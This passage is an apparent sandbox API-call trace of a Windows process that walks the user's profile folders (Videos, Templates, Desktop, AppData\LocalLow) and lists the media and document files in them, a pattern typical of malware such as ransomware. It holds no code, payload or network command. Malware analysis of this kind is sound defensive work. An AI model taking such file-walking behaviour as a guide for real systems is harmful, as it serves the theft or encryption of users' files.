dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.786] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.786] PathFindFileNameW (pszPath="") returned="" [0228.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.786] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.787] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0228.787] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.787] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.787] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.787] PathFindFileNameW (pszPath="") returned="" [0228.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0228.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bf80 | out: hHeap=0x620000) returned 1 [0228.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bbd8 | out: hHeap=0x620000) returned 1 [0228.787] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.787] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0228.787] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.787] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.787] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.787] PathFindFileNameW (pszPath="") returned="" [0228.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3959ed0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3959ed0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3959ed0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3959ed0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5ceb1d0, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x342d30a0, ftLastAccessTime.dwHighDateTime=0x1d5b5e6, ftLastWriteTime.dwLowDateTime=0x342d30a0, ftLastWriteTime.dwHighDateTime=0x1d5b5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2 M12KpqJt__Iy", cAlternateFileName="2M12KP~1")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x531e0c40, ftCreationTime.dwHighDateTime=0x1d5bed4, ftLastAccessTime.dwLowDateTime=0x717cf40, ftLastAccessTime.dwHighDateTime=0x1d5c16b, ftLastWriteTime.dwLowDateTime=0x717cf40, ftLastWriteTime.dwHighDateTime=0x1d5c16b, nFileSizeHigh=0x0, nFileSizeLow=0x18c54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FA42ucFZ7btbWqUgPC.flv", cAlternateFileName="FA42UC~1.FLV")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296de6d0, ftCreationTime.dwHighDateTime=0x1d5c051, ftLastAccessTime.dwLowDateTime=0x6a5d2120, ftLastAccessTime.dwHighDateTime=0x1d5b61e, ftLastWriteTime.dwLowDateTime=0x6a5d2120, ftLastWriteTime.dwHighDateTime=0x1d5b61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imXqHXuq", cAlternateFileName="")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f47cb60, ftCreationTime.dwHighDateTime=0x1d5c19d, ftLastAccessTime.dwLowDateTime=0x5bb6a8f0, ftLastAccessTime.dwHighDateTime=0x1d5b63f, ftLastWriteTime.dwLowDateTime=0x5bb6a8f0, ftLastWriteTime.dwHighDateTime=0x1d5b63f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kYk5K01VVlQpw", cAlternateFileName="KYK5K0~1")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48c56c20, ftCreationTime.dwHighDateTime=0x1d5ba9c, ftLastAccessTime.dwLowDateTime=0x6aeb2350, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x6aeb2350, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0xfb62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WQJ5oVHU7.mkv", cAlternateFileName="WQJ5OV~1.MKV")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d88b70, ftCreationTime.dwHighDateTime=0x1d5bb48, ftLastAccessTime.dwLowDateTime=0x391c5720, ftLastAccessTime.dwHighDateTime=0x1d5c046, ftLastWriteTime.dwLowDateTime=0x391c5720, ftLastWriteTime.dwHighDateTime=0x1d5c046, nFileSizeHigh=0x0, nFileSizeLow=0x11878, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_5Scyv3UUtL1Q1i1w_tJ.avi", cAlternateFileName="_5SCYV~1.AVI")) returned 1 [0228.788] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d88b70, ftCreationTime.dwHighDateTime=0x1d5bb48, ftLastAccessTime.dwLowDateTime=0x391c5720, ftLastAccessTime.dwHighDateTime=0x1d5c046, ftLastWriteTime.dwLowDateTime=0x391c5720, ftLastWriteTime.dwHighDateTime=0x1d5c046, nFileSizeHigh=0x0, nFileSizeLow=0x11878, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_5Scyv3UUtL1Q1i1w_tJ.avi", cAlternateFileName="_5SCYV~1.AVI")) returned 0 [0228.788] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d80 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b9d0 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4cd0 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4c78 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc40 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bca8 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bd10 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bd78 | out: hHeap=0x620000) returned 1 [0228.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c50f0 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bde0 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c51a0 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7be48 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c51f8 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7beb0 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5250 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba38 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d28 | out: hHeap=0x620000) returned 1 [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0228.789] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.789] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0228.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0228.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.789] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.789] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.789] PathFindFileNameW (pszPath="") returned="" [0228.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0228.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0228.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0228.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0228.790] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.791] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.791] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\") returned="gDzXHkl4U_l2Ylj0rT\\" [0228.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0228.791] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.791] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.791] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.791] PathFindFileNameW (pszPath="") returned="" [0228.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78aad10, ftCreationTime.dwHighDateTime=0x1d5b5b7, ftLastAccessTime.dwLowDateTime=0x8162a0a0, ftLastAccessTime.dwHighDateTime=0x1d5c1ba, ftLastWriteTime.dwLowDateTime=0x8162a0a0, ftLastWriteTime.dwHighDateTime=0x1d5c1ba, nFileSizeHigh=0x0, nFileSizeLow=0xf4c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32f7bhkCAEoSWPD2.rtf", cAlternateFileName="32F7BH~1.RTF")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5862e20, ftCreationTime.dwHighDateTime=0x1d5ba4a, ftLastAccessTime.dwLowDateTime=0xcaa4a540, ftLastAccessTime.dwHighDateTime=0x1d5bc49, ftLastWriteTime.dwLowDateTime=0xcaa4a540, ftLastWriteTime.dwHighDateTime=0x1d5bc49, nFileSizeHigh=0x0, nFileSizeLow=0x13302, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B0SdFfhttCFqP53h.ods", cAlternateFileName="B0SDFF~1.ODS")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb650c290, ftCreationTime.dwHighDateTime=0x1d5b78f, ftLastAccessTime.dwLowDateTime=0xcffed430, ftLastAccessTime.dwHighDateTime=0x1d5bbd5, ftLastWriteTime.dwLowDateTime=0xcffed430, ftLastWriteTime.dwHighDateTime=0x1d5bbd5, nFileSizeHigh=0x0, nFileSizeLow=0xcebc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KE70feLBJuL.gif", cAlternateFileName="KE70FE~1.GIF")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98670c70, ftCreationTime.dwHighDateTime=0x1d5bf65, ftLastAccessTime.dwLowDateTime=0x5009ca80, ftLastAccessTime.dwHighDateTime=0x1d5baba, ftLastWriteTime.dwLowDateTime=0x5009ca80, ftLastWriteTime.dwHighDateTime=0x1d5baba, nFileSizeHigh=0x0, nFileSizeLow=0x15b48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ohyT8Iq.m4a", cAlternateFileName="")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf317fc60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x784e0420, ftLastAccessTime.dwHighDateTime=0x1d5b89e, ftLastWriteTime.dwLowDateTime=0x784e0420, ftLastWriteTime.dwHighDateTime=0x1d5b89e, nFileSizeHigh=0x0, nFileSizeLow=0x5f2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vj12p8AcN.png", cAlternateFileName="VJ12P8~1.PNG")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ac2850, ftCreationTime.dwHighDateTime=0x1d5b8d4, ftLastAccessTime.dwLowDateTime=0x3ebf00f0, ftLastAccessTime.dwHighDateTime=0x1d5b8a4, ftLastWriteTime.dwLowDateTime=0x3ebf00f0, ftLastWriteTime.dwHighDateTime=0x1d5b8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd211, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YgeYRwOrx4brXG.wav", cAlternateFileName="YGEYRW~1.WAV")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b2cd620, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xf3928d60, ftLastAccessTime.dwHighDateTime=0x1d5b7b1, ftLastWriteTime.dwLowDateTime=0xf3928d60, ftLastWriteTime.dwHighDateTime=0x1d5b7b1, nFileSizeHigh=0x0, nFileSizeLow=0xf3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_U 7JKtu.wav", cAlternateFileName="_U7JKT~1.WAV")) returned 1 [0228.793] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b2cd620, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xf3928d60, ftLastAccessTime.dwHighDateTime=0x1d5b7b1, ftLastWriteTime.dwLowDateTime=0xf3928d60, ftLastWriteTime.dwHighDateTime=0x1d5b7b1, nFileSizeHigh=0x0, nFileSizeLow=0xf3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_U 7JKtu.wav", cAlternateFileName="_U7JKT~1.WAV")) returned 0 [0228.793] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a088 | out: hHeap=0x620000) returned 1 [0228.794] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.794] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\") returned="UKh5\\" [0228.794] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0228.794] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.794] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.794] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.794] PathFindFileNameW (pszPath="") returned="" [0228.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 